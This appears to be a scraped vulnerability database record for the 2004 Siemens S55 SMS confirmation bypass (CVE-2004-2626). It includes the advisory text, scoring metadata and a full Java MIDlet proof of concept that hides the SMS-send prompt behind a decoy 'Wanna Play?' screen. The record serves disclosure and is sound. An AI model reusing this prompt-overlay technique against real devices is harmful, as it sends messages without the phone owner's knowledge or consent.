ID OSVDB:5703 Type osvdb Reporter FtR(ftr@phenoelit.de), FX(fx@phenoelit.de) Modified 2004-04-27T17:47:07
Description
Vulnerability Description
Siemens S55 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious application is executed, which could trick the user into unknowingly confirmimg an SMS message prompt, granting the application the ability to send arbitrary messages.
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Short Description
Siemens S55 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious application is executed, which could trick the user into unknowingly confirmimg an SMS message prompt, granting the application the ability to send arbitrary messages.
{"edition": 1, "title": "Siemens S55 SMS Send Prompt Bypass Weakness", "bulletinFamily": "software", "published": "2004-04-27T17:47:07", "lastseen": "2017-04-28T13:20:00", "history": [], "modified": "2004-04-27T17:47:07", "reporter": "FtR(ftr@phenoelit.de), FX(fx@phenoelit.de)", "hash": "c79155f7f6f97febbe5865de08adad8dc084cdadb32d0b1d10b4c52645b4a44a", "viewCount": 1, "href": "https://vulners.com/osvdb/OSVDB:5703", "description": "## Vulnerability Description\nSiemens S55 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious application is executed, which could trick the user into unknowingly confirmimg an SMS message prompt, granting the application the ability to send arbitrary messages.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSiemens S55 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious application is executed, which could trick the user into unknowingly confirmimg an SMS message prompt, granting the application the ability to send arbitrary messages.\n## References:\nSecurity Tracker: 1009959\n[Secunia Advisory ID:11492](https://secuniaresearch.flexerasoftware.com/advisories/11492/)\nOther Advisory URL: http://lists.netsys.com/pipermail/full-disclosure/2004-April/020557.html\nGeneric Informational URL: http://lists.netsys.com/pipermail/full-disclosure/2004-April/020661.html\n[CVE-2004-2626](https://vulners.com/cve/CVE-2004-2626)\nBugtraq ID: 10227\n", "affectedSoftware": [{"name": "S55", "version": "09.2179+", "operator": "eq"}], "type": "osvdb", "hashmap": [{"key": "affectedSoftware", "hash": "a333779b45310290f24aac90a3d93c55"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "0c0102786e4950debce3e021a1b3d251"}, {"key": "cvss", "hash": "c306a62a6624d073fa0f285006558cae"}, {"key": "description", "hash": "266c5495b80b857a8383c9ccae6844d9"}, {"key": "href", "hash": "b6e7c6f047007c392ab5da02cc34907f"}, {"key": "modified", "hash": "878d8449b95e9f7443c6923a9a9f2fa5"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "878d8449b95e9f7443c6923a9a9f2fa5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "433ec5d105c43c8b9d32f6d5d7350171"}, {"key": "title", "hash": "27747587c9b6855a96bffe6644852771"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2017-04-28T13:20:00"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-2626"]}, {"type": "exploitdb", "idList": ["EDB-ID:24065"]}], "modified": "2017-04-28T13:20:00"}, "vulnersScore": 5.7}, "cvss": {"vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 3.7}, "cvelist": ["CVE-2004-2626"], "id": "OSVDB:5703"}
{"cve": [{"lastseen": "2019-05-29T18:08:04", "bulletinFamily": "NVD", "description": "GUI overlay vulnerability in the Java API in Siemens S55 cellular phones allows remote attackers to send unauthorized SMS messages by overlaying a confirmation message with a malicious message.", "modified": "2017-07-20T01:29:00", "id": "CVE-2004-2626", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2626", "published": "2004-12-31T05:00:00", "title": "CVE-2004-2626", "type": "cve", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T22:26:35", "bulletinFamily": "exploit", "description": "Siemens S55 Cellular Telephone SMS Confirmation Message Bypass Vulnerability. CVE-2004-2626. Remote exploit for hardware platform", "modified": "2004-04-27T00:00:00", "published": "2004-04-27T00:00:00", "id": "EDB-ID:24065", "href": "https://www.exploit-db.com/exploits/24065/", "type": "exploitdb", "title": "Siemens S55 Cellular Telephone Sms Confirmation Message Bypass Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/10227/info\r\n\r\nReportedly the Siemens S55 is affected by an SMS confirmation message bypass vulnerability. This issue is due to a race condition error that allows a malicious programmer to send SMS messages from unsuspecting cellular telephone user's telephones while obscuring the confirmation request.\r\n\r\nThis issue may allow a malicious programmer to develop an application that can send SMS messages without the cellular telephone user's knowledge.\r\n\r\n package hello;\r\n import javax.microedition.lcdui.*;\r\n import javax.microedition.midlet.*;\r\n import com.siemens.mp.game.Sound;\r\n import com.siemens.mp.gsm.*;\r\n import java.lang.*;\r\n import java.io.*;\r\n\r\n public class hello extends MIDlet implements CommandListener\r\n {\r\n static final String EXIT_COMMAND_LABEL = \"Exit FtRs world\";\r\n Display display;\r\n static hello hello;\r\n\r\n public void startApp (){\r\n HelloCanva kanvas = new HelloCanva();\r\n Scr2 scr2 = new Scr2();\r\n display = Display.getDisplay(this);\r\n // Menu\r\n Command exitCommand = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0);\r\n scr2.addCommand(exitCommand);\r\n scr2.setCommandListener(this);\r\n //Data\r\n\r\n // screen 1\r\n display.setCurrent(kanvas);\r\n mycall();\r\n // screen 2\r\n display.setCurrent(scr2);\r\n //destroyApp(false);\r\n }\r\n\r\n public void mycall(){\r\n\r\n String SMSstr= \"Test\";\r\n\r\n try {\r\n /* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/\r\n SMS.send(\"0170-Numder\", SMSstr);\r\n }\r\n /* Exception handling */\r\n catch (com.siemens.mp.NotAllowedException ex) {\r\n // Some handling code ...\r\n }\r\n catch (IOException ex) {\r\n //Some handling code ...\r\n }\r\n catch (IllegalArgumentException ex) {\r\n // Some handling code ...\r\n }\r\n } //public viod call()\r\n\r\n protected void destroyApp (boolean b){\r\n display.setCurrent(null);\r\n this.notifyDestroyed(); // notify KVM\r\n }\r\n\r\n protected void pauseApp ()\r\n { }\r\n\r\n public void commandAction (Command c, Displayable d){\r\n destroyApp(false);\r\n }\r\n\r\n }\r\n\r\n class HelloCanva extends Canvas\r\n {\r\n public void paint (Graphics g)\r\n {\r\n String str = new String(\"Wanna Play?\");\r\n g.setColor(0,0,0);\r\n g.fillRect(0, 0, getWidth(), getHeight());\r\n g.setColor(255,0,0);\r\n g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);\r\n g.drawString(\"yes\", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);\r\n g.drawString(\"no\", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);\r\n }\r\n }\r\n class Scr2 extends Canvas\r\n {\r\n public void paint (Graphics g) {\r\n String str = new String(\"cool\");\r\n g.setColor(0,0,0);\r\n g.fillRect(0, 0, getWidth(), getHeight());\r\n g.setColor(255,0,0);\r\n g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);\r\n }\r\n }", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24065/"}]}
